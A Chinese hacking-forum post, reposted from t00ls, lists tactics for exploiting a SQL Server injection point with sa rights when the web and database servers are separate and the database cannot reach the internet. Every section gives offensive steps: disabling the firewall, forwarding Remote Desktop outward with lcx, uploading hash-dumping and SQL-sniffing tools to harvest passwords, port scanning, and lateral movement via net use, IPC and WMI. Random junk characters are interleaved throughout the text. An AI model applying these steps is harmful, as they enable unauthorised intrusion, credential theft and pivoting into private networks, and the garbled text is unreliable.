当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。8 R, |& |. s) K6 e$ t! c$ ]
# z; ^% y9 J& s4 v7 h$ a
8 X$ Z2 C$ c8 J7 h6 _' L' f$ Z' X: q- l' S* _4 g, p. U/ L
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)& X; v( G# R# h q) ?
; J$ S; T! F! [# x% u4 N Z2 F, I
6 m; |/ k# B- h# Z* W S0 i6 Z9 k一、DB机有公网IP.
, }4 Q+ ?: y$ A- G0 K- a' M( }0 ]# R3 q! Z, V
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.9 b: v: Y( t3 I5 {: O7 _0 [
V( I4 D. Y5 C' S
- L& c4 M5 E) q2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.+ j) P2 j7 T E3 n' \3 t
/ g6 K# N) Y2 K. Z: b' V& l8 N
( n" `% _7 _. p {( D: ~# Z( G7 `3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com; C* X, O( Z0 J0 Z( c& x. i! j
1 m/ Z7 W+ y- V" s" l3 R
" U6 i- p; L( Y6 y; X4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
) P) s4 {# P* e1 ~; b; T
) @) r0 J/ }# p
. _% U5 H5 I" F
% v$ g+ L: [" T6 Y. B2 B% K二、DB机只有内网IP
+ J! e3 e( Z3 b# c% i' W2 ?9 B
5 Z+ I+ Y/ {6 Z; v9 r1 \& Q1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.4 s, k% D" B6 p( x& L
5 @8 _" {) H1 s% b* ]2 A( L- q) C0 m9 f8 ^& d' v$ W
2:停掉防火墙和IP策略再从内往外扫描.1 f+ @" R& u) v" N7 w7 A
9 w6 f+ ^+ ~& f2 }4 N2 X
$ @7 q7 c* l' b( p$ a" O; O
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
! R5 N0 g/ J* J& }1 [$ x: _5 f, S& P4 @: n; Z9 H: l
# j4 A8 P! q! M; Z3 @# F2 \
4:学会密码规律分析往往会有惊喜.
, V$ e: p3 ?4 T6 A I7 i% h) A0 y5 g# ?4 O8 q; H7 _) y
+ K( N- B" l6 x6 t4 N; ?7 W5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
# o& O9 i# z' Z# U1 p5 j! [4 X# y% e: A
2 l5 \% v: q1 Y有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对